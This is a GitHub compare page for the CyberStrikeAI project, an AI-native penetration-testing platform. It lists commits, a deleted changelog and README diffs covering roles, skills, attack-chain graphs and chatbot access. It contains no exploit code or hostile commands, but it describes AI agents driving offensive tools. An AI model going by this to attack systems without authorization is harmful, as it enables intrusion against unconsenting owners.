Compare commits

...

149 Commits

Author SHA1 Message Date
公明 8a2177ffab Update version to v1.3.19 in config.yaml 2026-03-08 04:02:59 +08:00
公明 3a7bbfbb88 Delete internal/handler/wecom_test.go 2026-03-08 04:02:05 +08:00
公明 7c01641de9 Add files via upload 2026-03-08 04:01:33 +08:00
公明 1c1086eea4 Merge pull request #53 from 04cb/fix/ensure-user-message-after-compression
Fix Qwen model error by ensuring user message is kept after memory compression
2026-03-07 14:20:37 +08:00
04cb 8f4f40f894 Fix Qwen model error by ensuring user message is kept after memory compression
Qwen models require a user message in the message array, otherwise they return
'No user query found in messages' error. The adjustRecentStartForToolCalls
function now ensures at least one user message is included in recent messages
after compression to prevent this validation error.
2026-03-07 13:31:32 +08:00
公明 7f16ba706a Add files via upload 2026-03-07 13:19:46 +08:00
公明 0b950f95db Add files via upload 2026-03-07 00:17:02 +08:00
公明 d36984a1c1 Add files via upload 2026-03-06 23:21:16 +08:00
公明 da2109a970 Update version number to v1.3.18 2026-03-06 23:18:49 +08:00
公明 1866aa8089 Add files via upload 2026-03-06 22:51:18 +08:00
公明 5af06e539d Update config.yaml 2026-03-06 22:42:19 +08:00
公明 7493e70686 Add files via upload 2026-03-06 22:39:30 +08:00
公明 81f7a601b7 Update config.yaml 2026-03-06 21:06:42 +08:00
公明 27830d1399 Add files via upload 2026-03-06 20:11:22 +08:00
公明 d9a0178f80 Merge pull request #47 from chhs1129/fix-bug-logger-missing-error
Fix: logger shows empty error msg
2026-03-06 10:20:44 +08:00
chhs1129 1dd8cc7f50 Fix: logger shows empty error msg 2026-03-05 09:40:47 -08:00
公明 55045dd4e0 Add files via upload 2026-03-04 00:18:29 +08:00
公明 90508c9084 Update version to v1.3.16 in config.yaml 2026-03-03 20:03:56 +08:00
公明 361480f2d1 Add files via upload 2026-03-03 19:55:24 +08:00
公明 538565117b Add files via upload 2026-03-03 19:36:56 +08:00
公明 1c8742b7b6 Update README_CN.md 2026-03-03 13:52:50 +08:00
公明 2fb6a1d1ef Add disclaimer for ethical use of CyberStrikeAI
Added a disclaimer section emphasizing the ethical use of the tool.
2026-03-03 10:07:43 +08:00
公明 6e390acb3d Update README.md 2026-03-03 10:06:31 +08:00
公明 d6236e285d Update version to v1.3.15 in config.yaml 2026-03-03 01:34:14 +08:00
公明 ad8efffbb4 Add files via upload 2026-03-03 01:31:05 +08:00
公明 352d9b712c Add files via upload 2026-03-03 01:30:23 +08:00
公明 acadbe19c6 Add files via upload 2026-03-03 01:28:30 +08:00
公明 c265e66afb Update config.yaml 2026-03-02 20:41:41 +08:00
公明 647bb4b5e4 Add files via upload 2026-03-02 20:37:27 +08:00
公明 dd311f7a3b Add files via upload 2026-03-02 20:13:16 +08:00
公明 2e482a3baf Update version number to v1.3.13 2026-03-02 01:11:08 +08:00
公明 67d5e7f11e Add files via upload 2026-03-02 01:10:44 +08:00
公明 7e0198a64c Add files via upload 2026-03-02 00:58:40 +08:00
公明 1e50272229 Update version number to v1.3.12 2026-03-02 00:52:38 +08:00
公明 39b47a86fb Add files via upload 2026-03-02 00:49:21 +08:00
公明 74738ee555 Add files via upload 2026-03-01 13:35:11 +08:00
公明 90bc3f4b61 Update config.yaml 2026-02-28 23:34:07 +08:00
公明 ad96be3c64 Add files via upload 2026-02-28 23:31:17 +08:00
公明 8866ff4cdd Add files via upload 2026-02-28 23:09:48 +08:00
公明 3534a956b2 Add files via upload 2026-02-28 23:03:09 +08:00
公明 691793cb38 Update config.yaml 2026-02-28 00:52:51 +08:00
公明 7270e3c3d1 Add files via upload 2026-02-28 00:52:17 +08:00
公明 5e28782b1f Add files via upload 2026-02-28 00:33:35 +08:00
公明 3e61b77b9c Add files via upload 2026-02-28 00:30:53 +08:00
公明 64f9053061 Update config.yaml 2026-02-28 00:29:04 +08:00
公明 426b0e282e Add files via upload 2026-02-28 00:27:09 +08:00
公明 78c6bd0b6a Add files via upload 2026-02-25 19:58:28 +08:00
公明 e54815e018 Update config.yaml 2026-02-21 01:02:38 +08:00
公明 9baa99ea40 Add files via upload 2026-02-21 01:01:51 +08:00
公明 83a8c46db1 Add files via upload 2026-02-21 00:50:59 +08:00
公明 4b2619e1fe Update config.yaml 2026-02-20 18:48:07 +08:00
公明 3fffee80f4 Add files via upload 2026-02-20 18:43:50 +08:00
公明 41d7afcf99 Add files via upload 2026-02-20 18:10:29 +08:00
公明 6431dcb240 Add files via upload 2026-02-20 17:53:38 +08:00
公明 665b1d553a Update config.yaml 2026-02-20 16:53:21 +08:00
公明 fd3a52af01 Add files via upload 2026-02-20 16:40:59 +08:00
公明 8368ee7712 Add FOFA API configuration to config.yaml
Add optional FOFA configuration for information collection.
2026-02-20 16:18:53 +08:00
公明 dd883677b8 Add files via upload 2026-02-20 16:16:48 +08:00
公明 2edd5ffe95 Update README_CN.md 2026-02-11 10:31:40 +08:00
公明 ae588dbfe4 Update README.md 2026-02-11 10:29:54 +08:00
公明 93be113a79 Add files via upload 2026-02-11 01:01:56 +08:00
公明 d3fb14f72d Update requirements.txt 2026-02-11 00:57:56 +08:00
公明 af715e23cb Add files via upload 2026-02-11 00:50:39 +08:00
公明 3aecdc275f Add files via upload 2026-02-11 00:44:12 +08:00
公明 660d95a787 Add files via upload 2026-02-11 00:20:50 +08:00
公明 01271fd8eb Add files via upload 2026-02-10 23:48:27 +08:00
公明 8c6e044f84 Add files via upload 2026-02-10 23:37:43 +08:00
公明 cb2defd0cc Add files via upload 2026-02-09 20:10:59 +08:00
公明 88ab73e422 Add files via upload 2026-02-09 20:10:37 +08:00
公明 5404d95db7 Update config.yaml 2026-02-09 19:44:11 +08:00
公明 32d0e98cfb Add files via upload 2026-02-09 19:36:57 +08:00
公明 e4b1e10a42 Add files via upload 2026-02-09 19:26:57 +08:00
公明 870715fc8f Add files via upload 2026-02-09 19:20:43 +08:00
公明 772a04b715 Add files via upload 2026-02-09 19:15:04 +08:00
公明 2455bde7ab Update requirements.txt 2026-02-09 13:33:30 +08:00
公明 dbdfc18d57 Delete tools/list-files.yaml 2026-02-09 10:43:54 +08:00
公明 82daad3b56 Update config.yaml 2026-02-09 00:15:56 +08:00
公明 9eee820096 Add files via upload 2026-02-09 00:07:25 +08:00
公明 fae912b79c Add files via upload 2026-02-09 00:01:33 +08:00
公明 9b48daf795 Add files via upload 2026-02-08 23:57:46 +08:00
公明 bfbb8b31d3 Add files via upload 2026-02-08 23:43:46 +08:00
公明 8b2dfea884 Add files via upload 2026-02-08 23:38:57 +08:00
公明 7447e82c39 Add files via upload 2026-02-08 23:15:43 +08:00
公明 44b8d0b427 Add files via upload 2026-02-08 22:01:56 +08:00
公明 3a26d77c94 Update config.yaml 2026-02-08 21:29:08 +08:00
公明 0be6746794 Add files via upload 2026-02-08 21:28:20 +08:00
公明 06bfed508a Update requirements.txt 2026-02-08 20:56:15 +08:00
公明 0d617ebd66 Add files via upload 2026-02-08 20:46:51 +08:00
公明 9a52ec25ea Add files via upload 2026-02-08 20:40:50 +08:00
公明 594b7676e1 Add files via upload 2026-02-08 20:38:50 +08:00
公明 fd5d1dff10 Add files via upload 2026-02-08 20:20:43 +08:00
公明 b8218d9f77 Add tool description mode to security config
Add tool description mode configuration options.
2026-02-08 20:11:04 +08:00
公明 7b7c689efd Add files via upload 2026-02-08 20:09:23 +08:00
公明 27b16e0d54 Add files via upload 2026-02-07 00:04:59 +08:00
公明 2b6b678439 Add files via upload 2026-02-04 19:39:29 +08:00
公明 be104d1a05 Add files via upload 2026-02-04 19:37:46 +08:00
公明 f64bda3678 Add files via upload 2026-02-04 19:07:32 +08:00
公明 4b8dbb1bd6 Delete internal/mcp/client.go 2026-02-04 10:14:49 +08:00
公明 783d80ee37 Add files via upload 2026-02-04 02:00:52 +08:00
公明 a27c13b734 Add files via upload 2026-02-04 01:57:01 +08:00
公明 3cbf398636 Add files via upload 2026-02-04 01:39:11 +08:00
公明 84d54b1ea9 Add files via upload 2026-02-04 01:34:25 +08:00
公明 91230f273e Add files via upload 2026-01-29 19:32:33 +08:00
公明 81fca5b2dd Add files via upload 2026-01-29 19:19:38 +08:00
公明 01b6b226eb Add files via upload 2026-01-28 23:58:57 +08:00
公明 efd7a0aadd Add files via upload 2026-01-28 20:34:21 +08:00
公明 895061911c Add files via upload 2026-01-28 20:19:02 +08:00
公明 a99387fd6d Add files via upload 2026-01-28 20:02:06 +08:00
公明 068dbc1209 Add files via upload 2026-01-28 19:49:34 +08:00
公明 7c35c93f23 Add files via upload 2026-01-28 19:20:22 +08:00
公明 79fa951da8 Add files via upload 2026-01-27 22:04:41 +08:00
公明 3ce9c42333 Update README_CN to remove CHANGELOG reference
Removed reference to CHANGELOG.md from the README_CN.
2026-01-27 21:06:13 +08:00
公明 f3b8f231dd Update README.md 2026-01-27 21:05:57 +08:00
公明 6815e03842 Add files via upload 2026-01-27 20:56:20 +08:00
公明 42e9ad3bda Add files via upload 2026-01-24 15:45:10 +08:00
公明 6321df417b Add files via upload 2026-01-17 14:17:20 +08:00
公明 7f1ebe5c3d Add files via upload 2026-01-17 14:15:01 +08:00
公明 bb68f341d9 Add files via upload 2026-01-17 14:13:31 +08:00
公明 232fd9184a Add files via upload 2026-01-17 14:02:54 +08:00
公明 38571c7e82 Update README_CN.md 2026-01-17 13:38:20 +08:00
公明 8347244d62 Update README.md 2026-01-17 13:37:56 +08:00
公明 b25f455ca6 Add files via upload 2026-01-17 00:38:17 +08:00
公明 49a9b57500 Delete img directory 2026-01-17 00:37:36 +08:00
公明 06c9bb3bd8 Add files via upload 2026-01-17 00:33:22 +08:00
公明 d50fa3d633 Add files via upload 2026-01-17 00:07:26 +08:00
公明 7a1fc8313c Add files via upload 2026-01-16 23:35:34 +08:00
公明 7e145aecf5 Add files via upload 2026-01-16 21:52:29 +08:00
公明 3634bf40b4 Add files via upload 2026-01-16 21:10:06 +08:00
公明 d317e6f13f Add files via upload 2026-01-16 19:39:54 +08:00
公明 18fa0ad9e7 Add files via upload 2026-01-16 19:26:52 +08:00
公明 15a713743f Add files via upload 2026-01-16 00:18:16 +08:00
公明 4926335c71 Add files via upload 2026-01-16 00:16:01 +08:00
公明 dd6ca2d9d9 Add files via upload 2026-01-16 00:05:43 +08:00
公明 749cf6e37e Add files via upload 2026-01-15 23:56:41 +08:00
公明 d80c5914df Add files via upload 2026-01-15 23:41:57 +08:00
公明 45f4b52353 Add files via upload 2026-01-15 23:20:26 +08:00
公明 704bdc7f76 Update config.yaml 2026-01-15 22:36:30 +08:00
公明 650c56242a Add files via upload 2026-01-15 22:29:50 +08:00
公明 af2eccc9fc Add files via upload 2026-01-15 22:17:50 +08:00
公明 c617781e6b Add files via upload 2026-01-15 22:14:50 +08:00
公明 8660319b52 Add files via upload 2026-01-15 22:13:59 +08:00
公明 7afe355195 Delete CHANGELOG.md 2026-01-15 22:05:42 +08:00
公明 413806edbe Update recent highlights in README_CN.md 2026-01-15 22:02:41 +08:00
公明 e6ddd9d00c Update README.md 2026-01-15 22:01:59 +08:00
公明 68ad2bf67a Add files via upload 2026-01-15 22:00:10 +08:00
公明 67e2e56bd2 Add files via upload 2026-01-14 01:21:20 +08:00
公明 7d06a9575d Update http-framework-test.yaml 2026-01-13 19:23:07 +08:00
公明 09b0104403 Add files via upload 2026-01-13 01:18:59 +08:00
公明 66aa169a60 Add files via upload 2026-01-12 20:17:50 +08:00
134 changed files with 32749 additions and 3205 deletions
-169
View File
@@ -1,169 +0,0 @@
# Changelog
All notable changes to this project will be documented in this file.
The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/),
and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).
## [Unreleased]
## [1.2.0] - 2026-01-11
### Added
- Role-based testing feature: predefined security testing roles with custom system prompts and tool restrictions. Users can select roles (Penetration Testing, CTF, Web App Scanning, etc.) from the chat interface to customize AI behavior and available tools. Roles are defined as YAML files in the `roles/` directory with support for hot-reload.
## [1.1.0] - 2026-01-08
### Added
- SSE (Server-Sent Events) transport mode support for external MCP servers. External MCP federation now supports HTTP, stdio, and SSE modes. SSE mode enables real-time streaming communication for push-based scenarios.
## [1.0.0] - 2026-01-01
### Added
- Batch task management feature: create task queues with multiple tasks, add/edit/delete tasks before execution, and execute them sequentially. Each task runs as a separate conversation with status tracking (pending/running/completed/failed/cancelled). All queues and tasks are persisted in the database.
## [0.7.0] - 2025-12-25
### Added
- Vulnerability management feature: full CRUD operations for tracking vulnerabilities discovered during testing. Supports severity levels (critical/high/medium/low/info), status workflow (open/confirmed/fixed/false_positive), filtering by conversation/severity/status, and comprehensive statistics dashboard.
- Conversation grouping feature: organize conversations into groups, pin groups to top, rename/delete groups via context menu. All group data is persisted in the database.
## [0.6.1] - 2025-12-24
### Changed
- Refactored attack chain generation logic, achieving 2x faster generation speed. Redesigned attack chain frontend visualization for improved user experience.
## [0.6.0] - 2025-12-20
### Added
- Knowledge base feature with vector search, hybrid retrieval, and automatic indexing. AI agent can now search security knowledge during conversations.
## [0.5.1] - 2025-12-19
### Added
- ZoomEye network space search engine tool (zoomeye_search) with support for IPv4/IPv6/web assets, facets statistics, and flexible query parameters.
## [0.5.0] - 2025-12-18
### Changed
- Optimized web frontend with enhanced sidebar navigation and improved user experience.
## [0.4.1] - 2025-12-07
### Added
- FOFA network space search engine tool (fofa_search) with flexible query parameters and field configuration.
### Fixed
- Positional parameter handling bug: ensure correct parameter position when using default values.
## [0.4.0] - 2025-11-20
### Added
- Automatic compression/summarization for oversized tool logs and MCP transcripts.
## [0.3.0] - 2025-11-17
### Added
- AI-built attack-chain visualization with interactive graph and risk scoring.
## [0.2.0] - 2025-11-15
### Added
- Large-result pagination, advanced filtering, and external MCP federation.
## [0.1.1] - 2025-11-14
### Changed
- Optimized tool lookups to O(1) time complexity.
- Execution record cleanup and DB pagination improvements.
## [0.1.0] - 2025-11-13
### Added
- Web authentication, settings UI, and MCP stdio mode integration.
---
# 更新日志
本项目的重要变更将记录在此文件中。
格式基于 [Keep a Changelog](https://keepachangelog.com/en/1.0.0/)
并遵循 [语义化版本](https://semver.org/lang/zh-CN/)。
## [未发布]
## [1.2.0] - 2026-01-11
### 新增
- 角色化测试功能:预设安全测试角色,支持自定义系统提示词和工具限制。用户可在聊天界面选择角色(渗透测试、CTF、Web 应用扫描等),以自定义 AI 行为和可用工具。角色以 YAML 文件形式定义在 `roles/` 目录,支持热加载。
## [1.1.0] - 2026-01-08
### 新增
- SSEServer-Sent Events)传输模式支持,外部 MCP 联邦现支持 HTTP、stdio 和 SSE 三种模式。SSE 模式支持实时流式通信,适用于基于推送的场景。
## [1.0.0] - 2026-01-01
### 新增
- 批量任务管理功能:支持创建任务队列,批量添加多个任务,执行前可编辑或删除任务,然后依次顺序执行。每个任务作为独立对话运行,支持状态跟踪(待执行/执行中/已完成/失败/已取消),所有队列和任务数据持久化存储到数据库。
## [0.7.0] - 2025-12-25
### 新增
- 漏洞管理功能:完整的漏洞 CRUD 操作,支持跟踪测试过程中发现的漏洞。支持严重程度分级(严重/高/中/低/信息)、状态流转(待确认/已确认/已修复/误报)、按对话/严重程度/状态过滤,以及统计看板。
- 对话分组功能:支持创建分组、将对话移动到分组、分组置顶、重命名和删除等操作,所有分组数据持久化存储到数据库。
## [0.6.1] - 2025-12-24
### 变更
- 重构攻击链生成逻辑,生成速度提升一倍。重构攻击链前端页面展示,优化用户体验。
## [0.6.0] - 2025-12-20
### 新增
- 知识库功能:支持向量检索、混合搜索与自动索引,AI 智能体可在对话中自动搜索安全知识。
## [0.5.1] - 2025-12-19
### 新增
- 钟馗之眼(ZoomEye)网络空间搜索引擎工具(zoomeye_search),支持 IPv4/IPv6/Web 等资产搜索、统计项查询与灵活的查询参数配置。
## [0.5.0] - 2025-12-18
### 变更
- 优化 Web 前端界面,增加侧边栏导航,提升用户体验。
## [0.4.1] - 2025-12-07
### 新增
- FOFA 网络空间搜索引擎工具(fofa_search),支持灵活的查询参数与字段配置。
### 修复
- 修复位置参数处理 bug:当工具参数使用默认值时,确保后续参数位置正确传递。
## [0.4.0] - 2025-11-20
### 新增
- 支持超大日志/MCP 记录的自动压缩与摘要回写。
## [0.3.0] - 2025-11-17
### 新增
- 上线 AI 驱动的攻击链图谱与风险评分。
## [0.2.0] - 2025-11-15
### 新增
- 提供大结果分页检索与外部 MCP 挂载能力。
## [0.1.1] - 2025-11-14
### 变更
- 工具检索优化至 O(1) 时间复杂度。
- 执行记录清理、数据库分页优化。
## [0.1.0] - 2025-11-13
### 新增
- Web 鉴权、Settings 面板与 MCP stdio 模式发布。
+100 -38
View File
@@ -1,5 +1,5 @@
<div align="center">
<img src="web/static/logo.png" alt="CyberStrikeAI Logo" width="300">
<img src="web/static/logo.png" alt="CyberStrikeAI Logo" width="200">
</div>
# CyberStrikeAI
@@ -7,31 +7,67 @@
[中文](README_CN.md) | [English](README.md)
CyberStrikeAI is an **AI-native security testing platform** built in Go. It integrates 100+ security tools, an intelligent orchestration engine, and comprehensive lifecycle management capabilities. Through native MCP protocol and AI agents, it enables end-to-end automation from conversational commands to vulnerability discovery, attack-chain analysis, knowledge retrieval, and result visualization—delivering an auditable, traceable, and collaborative testing environment for security teams.
CyberStrikeAI is an **AI-native security testing platform** built in Go. It integrates 100+ security tools, an intelligent orchestration engine, role-based testing with predefined security roles, a skills system with specialized testing skills, and comprehensive lifecycle management capabilities. Through native MCP protocol and AI agents, it enables end-to-end automation from conversational commands to vulnerability discovery, attack-chain analysis, knowledge retrieval, and result visualization—delivering an auditable, traceable, and collaborative testing environment for security teams.
## Interface & Integration Preview
### Web Console
<img src="./img/效果.png" alt="Web Console" width="560">
<div align="center">
### MCP Integration
- **MCP stdio mode**
<img src="./img/mcp-stdio2.png" alt="MCP stdio mode" width="560">
- **MCP management**
<img src="./img/MCP管理.png" alt="MCP management" width="560">
### System Dashboard Overview
### Attack Chain Visualization
<img src="./img/攻击链.png" alt="Attack Chain" width="560">
<img src="./images/dashboard.png" alt="System Dashboard" width="100%">
### Vulnerability Management
<img src="./img/漏洞管理.png" alt="Vulnerability Management" width="560">
*The dashboard provides a comprehensive overview of system runtime status, security vulnerabilities, tool usage, and knowledge base, helping users quickly understand the platform's core features and current state.*
### Task Management
<img src="./img/任务.png" alt="Task Management" width="560">
### Core Features Overview
### Role Management
<img src="./img/角色管理.png" alt="Role Management" width="560">
<table>
<tr>
<td width="33.33%" align="center">
<strong>Web Console</strong><br/>
<img src="./images/web-console.png" alt="Web Console" width="100%">
</td>
<td width="33.33%" align="center">
<strong>Attack Chain Visualization</strong><br/>
<img src="./images/attack-chain.png" alt="Attack Chain" width="100%">
</td>
<td width="33.33%" align="center">
<strong>Task Management</strong><br/>
<img src="./images/task-management.png" alt="Task Management" width="100%">
</td>
</tr>
<tr>
<td width="33.33%" align="center">
<strong>Vulnerability Management</strong><br/>
<img src="./images/vulnerability-management.png" alt="Vulnerability Management" width="100%">
</td>
<td width="33.33%" align="center">
<strong>MCP Management</strong><br/>
<img src="./images/mcp-management.png" alt="MCP management" width="100%">
</td>
<td width="33.33%" align="center">
<strong>MCP stdio Mode</strong><br/>
<img src="./images/mcp-stdio2.png" alt="MCP stdio mode" width="100%">
</td>
</tr>
<tr>
<td width="33.33%" align="center">
<strong>Knowledge Base</strong><br/>
<img src="./images/knowledge-base.png" alt="Knowledge Base" width="100%">
</td>
<td width="33.33%" align="center">
<strong>Skills Management</strong><br/>
<img src="./images/skills.png" alt="Skills Management" width="100%">
</td>
<td width="33.33%" align="center">
<strong>Role Management</strong><br/>
<img src="./images/role-management.png" alt="Role Management" width="100%">
</td>
</tr>
</table>
</div>
## Highlights
@@ -46,6 +82,8 @@ CyberStrikeAI is an **AI-native security testing platform** built in Go. It inte
- 🛡️ Vulnerability management with CRUD operations, severity tracking, status workflow, and statistics
- 📋 Batch task management: create task queues, add multiple tasks, and execute them sequentially
- 🎭 Role-based testing: predefined security testing roles (Penetration Testing, CTF, Web App Scanning, etc.) with custom prompts and tool restrictions
- 🎯 Skills system: 20+ predefined security testing skills (SQL injection, XSS, API security, etc.) that can be attached to roles or called on-demand by AI agents
- 📱 **Chatbot**: DingTalk and Lark (Feishu) long-lived connections so you can talk to CyberStrikeAI from mobile (see [Robot / Chatbot guide](docs/robot_en.md) for setup and commands)
## Tool Overview
@@ -145,7 +183,8 @@ go build -o cyberstrike-ai cmd/server/main.go
- **Predefined roles** System includes 12+ predefined security testing roles (Penetration Testing, CTF, Web App Scanning, API Security Testing, Binary Analysis, Cloud Security Audit, etc.) in the `roles/` directory.
- **Custom prompts** Each role can define a `user_prompt` that prepends to user messages, guiding the AI to adopt specialized testing methodologies and focus areas.
- **Tool restrictions** Roles can specify a `tools` list to limit available tools, ensuring focused testing workflows (e.g., CTF role restricts to CTF-specific utilities).
- **Easy role creation** Create custom roles by adding YAML files to the `roles/` directory. Each role defines `name`, `description`, `user_prompt`, `icon`, `tools`, and `enabled` fields.
- **Skills integration** Roles can attach security testing skills. Skill names are added to system prompts as hints, and AI agents can access skill content on-demand using the `read_skill` tool.
- **Easy role creation** Create custom roles by adding YAML files to the `roles/` directory. Each role defines `name`, `description`, `user_prompt`, `icon`, `tools`, `skills`, and `enabled` fields.
- **Web UI integration** Select roles from a dropdown in the chat interface. Role selection affects both AI behavior and available tool suggestions.
**Creating a custom role (example):**
@@ -159,10 +198,25 @@ go build -o cyberstrike-ai cmd/server/main.go
- api-fuzzer
- arjun
- graphql-scanner
skills:
- api-security-testing
- sql-injection-testing
enabled: true
```
2. Restart the server or reload configuration; the role appears in the role selector dropdown.
### Skills System
- **Predefined skills** System includes 20+ predefined security testing skills (SQL injection, XSS, API security, cloud security, container security, etc.) in the `skills/` directory.
- **Skill hints in prompts** When a role is selected, skill names attached to that role are added to the system prompt as recommendations. Skill content is not automatically injected; AI agents must use the `read_skill` tool to access skill details when needed.
- **On-demand access** AI agents can also access skills on-demand using built-in tools (`list_skills`, `read_skill`), allowing dynamic skill retrieval during task execution.
- **Structured format** Each skill is a directory containing a `SKILL.md` file with detailed testing methods, tool usage, best practices, and examples. Skills support YAML front matter for metadata.
- **Custom skills** Create custom skills by adding directories to the `skills/` directory. Each skill directory should contain a `SKILL.md` file with the skill content.
**Creating a custom skill:**
1. Create a directory in `skills/` (e.g., `skills/my-skill/`)
2. Create a `SKILL.md` file in that directory with the skill content
3. Attach the skill to a role by adding it to the role's `skills` field in the role YAML file
### Tool Orchestration & Extensions
- **YAML recipes** in `tools/*.yaml` describe commands, arguments, prompts, and metadata.
- **Directory hot-reload** pointing `security.tools_dir` to a folder is usually enough; inline definitions in `config.yaml` remain supported for quick experiments.
@@ -364,6 +418,7 @@ knowledge:
similarity_threshold: 0.7 # Minimum similarity score (0-1)
hybrid_weight: 0.7 # Weight for vector search (1.0 = pure vector, 0.0 = pure keyword)
roles_dir: "roles" # Role configuration directory (relative to config file)
skills_dir: "skills" # Skills directory (relative to config file)
```
### Tool Definition Example (`tools/nmap.yaml`)
@@ -406,6 +461,10 @@ tools:
enabled: true
```
## Related documentation
- [Robot / Chatbot guide (DingTalk & Lark)](docs/robot_en.md): Full setup, commands, and troubleshooting for using CyberStrikeAI from DingTalk or Lark on your phone. **Follow this doc to avoid common pitfalls.**
## Project Layout
```
@@ -415,7 +474,9 @@ CyberStrikeAI/
├── web/ # Static SPA + templates
├── tools/ # YAML tool recipes (100+ examples provided)
├── roles/ # Role configurations (12+ predefined security testing roles)
├── img/ # Docs screenshots & diagrams
├── skills/ # Skills directory (20+ predefined security testing skills)
├── docs/ # Documentation (e.g. robot/chbot guide)
├── images/ # Docs screenshots & diagrams
├── config.yaml # Runtime configuration
├── run.sh # Convenience launcher
└── README*.md
@@ -440,38 +501,39 @@ Compress the 5 MB nuclei report, summarize critical CVEs, and attach the artifac
Build an attack chain for the latest engagement and export the node list with severity >= high.
```
## Changelog
See [CHANGELOG.md](CHANGELOG.md) for detailed version history and all changes.
### Recent Highlights
- **2026-01-11** Role-based testing with predefined security testing roles
- **2026-01-08** SSE transport mode support for external MCP servers
- **2026-01-01** Batch task management with queue-based execution
- **2025-12-25** Vulnerability management and conversation grouping features
- **2025-12-20** Knowledge base with vector search and hybrid retrieval
## Star History
![Star History Chart](https://api.star-history.com/svg?repos=Ed1s0nZ/CyberStrikeAI&type=date&legend=top-left)
## 404Starlink
<img src="./img/404StarLinkLogo.png" width="30%">
<img src="./images/404StarLinkLogo.png" width="30%">
CyberStrikeAI has joined [404Starlink](https://github.com/knownsec/404StarLink)
## TCH Top-Ranked Intelligent Pentest Project
<div align="left">
<a href="https://zc.tencent.com/competition/competitionHackathon?code=cha004" target="_blank">
<img src="./img/tch.png" alt="TCH Top-Ranked Intelligent Pentest Project" width="30%">
<img src="./images/tch.png" alt="TCH Top-Ranked Intelligent Pentest Project" width="30%">
</a>
</div>
## Stargazers over time
![Stargazers over time](https://starchart.cc/Ed1s0nZ/CyberStrikeAI.svg)
---
## ⚠️ Disclaimer
**This tool is for educational and authorized testing purposes only!**
CyberStrikeAI is a professional security testing platform designed to assist security researchers, penetration testers, and IT professionals in conducting security assessments and vulnerability research **with explicit authorization**.
**By using this tool, you agree to:**
- Use this tool only on systems where you have clear written authorization
- Comply with all applicable laws, regulations, and ethical standards
- Take full responsibility for any unauthorized use or misuse
- Not use this tool for any illegal or malicious purposes
**The developers are not responsible for any misuse!** Please ensure your usage complies with local laws and regulations, and that you have obtained explicit authorization from the target system owner.
---
Need help or want to contribute? Open an issue or PR—community tooling additions are welcome!
+101 -37
View File
@@ -1,36 +1,72 @@
<div align="center">
<img src="web/static/logo.png" alt="CyberStrikeAI Logo" width="300">
<img src="web/static/logo.png" alt="CyberStrikeAI Logo" width="200">
</div>
# CyberStrikeAI
[中文](README_CN.md) | [English](README.md)
CyberStrikeAI 是一款 **AI 原生安全测试平台**,基于 Go 构建,集成了 100+ 安全工具、智能编排引擎完整的测试生命周期管理能力。通过原生 MCP 协议与 AI 智能体,支持从对话指令到漏洞发现、攻击链分析、知识检索与结果可视化的全流程自动化,为安全团队提供可审计、可追溯、可协作的专业测试环境。
CyberStrikeAI 是一款 **AI 原生安全测试平台**,基于 Go 构建,集成了 100+ 安全工具、智能编排引擎、角色化测试与预设安全测试角色、Skills 技能系统与专业测试技能,以及完整的测试生命周期管理能力。通过原生 MCP 协议与 AI 智能体,支持从对话指令到漏洞发现、攻击链分析、知识检索与结果可视化的全流程自动化,为安全团队提供可审计、可追溯、可协作的专业测试环境。
## 界面与集成预览
### Web 控制台
<img src="./img/效果.png" alt="Web 控制台" width="560">
<div align="center">
### MCP 集成
- **MCP stdio 模式**
<img src="./img/mcp-stdio2.png" alt="MCP stdio 模式" width="560">
- **MCP 管理**
<img src="./img/MCP管理.png" alt="MCP 管理" width="560">
### 系统仪表盘概览
### 攻击链可视化
<img src="./img/攻击链.png" alt="攻击链" width="560">
<img src="./images/dashboard.png" alt="系统仪表盘" width="100%">
### 漏洞管理
<img src="./img/漏洞管理.png" alt="漏洞管理" width="560">
*仪表盘提供系统运行状态、安全漏洞、工具使用情况和知识库的全面概览,帮助用户快速了解平台核心功能和当前状态。*
### 任务管理
<img src="./img/任务.png" alt="任务管理" width="560">
### 核心功能概览
### 角色管理
<img src="./img/角色管理.png" alt="角色管理" width="560">
<table>
<tr>
<td width="33.33%" align="center">
<strong>Web 控制台</strong><br/>
<img src="./images/web-console.png" alt="Web 控制台" width="100%">
</td>
<td width="33.33%" align="center">
<strong>攻击链可视化</strong><br/>
<img src="./images/attack-chain.png" alt="攻击链" width="100%">
</td>
<td width="33.33%" align="center">
<strong>任务管理</strong><br/>
<img src="./images/task-management.png" alt="任务管理" width="100%">
</td>
</tr>
<tr>
<td width="33.33%" align="center">
<strong>漏洞管理</strong><br/>
<img src="./images/vulnerability-management.png" alt="漏洞管理" width="100%">
</td>
<td width="33.33%" align="center">
<strong>MCP 管理</strong><br/>
<img src="./images/mcp-management.png" alt="MCP 管理" width="100%">
</td>
<td width="33.33%" align="center">
<strong>MCP stdio 模式</strong><br/>
<img src="./images/mcp-stdio2.png" alt="MCP stdio 模式" width="100%">
</td>
</tr>
<tr>
<td width="33.33%" align="center">
<strong>知识库</strong><br/>
<img src="./images/knowledge-base.png" alt="知识库" width="100%">
</td>
<td width="33.33%" align="center">
<strong>Skills 管理</strong><br/>
<img src="./images/skills.png" alt="Skills 管理" width="100%">
</td>
<td width="33.33%" align="center">
<strong>角色管理</strong><br/>
<img src="./images/role-management.png" alt="角色管理" width="100%">
</td>
</tr>
</table>
</div>
## 特性速览
@@ -45,6 +81,8 @@ CyberStrikeAI 是一款 **AI 原生安全测试平台**,基于 Go 构建,集
- 🛡️ 漏洞管理功能:完整的漏洞 CRUD 操作,支持严重程度分级、状态流转、按对话/严重程度/状态过滤,以及统计看板
- 📋 批量任务管理:创建任务队列,批量添加任务,依次顺序执行,支持任务编辑与状态跟踪
- 🎭 角色化测试:预设安全测试角色(渗透测试、CTF、Web 应用扫描等),支持自定义提示词和工具限制
- 🎯 Skills 技能系统:20+ 预设安全测试技能(SQL 注入、XSS、API 安全等),可附加到角色或由 AI 按需调用
- 📱 **机器人**:支持钉钉、飞书长连接,在手机端与 CyberStrikeAI 对话(配置与命令详见 [机器人使用说明](docs/robot.md)
## 工具概览
@@ -144,7 +182,8 @@ go build -o cyberstrike-ai cmd/server/main.go
- **预设角色**:系统内置 12+ 个预设的安全测试角色(渗透测试、CTF、Web 应用扫描、API 安全测试、二进制分析、云安全审计等),位于 `roles/` 目录。
- **自定义提示词**:每个角色可定义 `user_prompt`,会在用户消息前自动添加,引导 AI 采用特定的测试方法和关注重点。
- **工具限制**:角色可指定 `tools` 列表,限制可用工具,实现聚焦的测试流程(如 CTF 角色限制为 CTF 专用工具)。
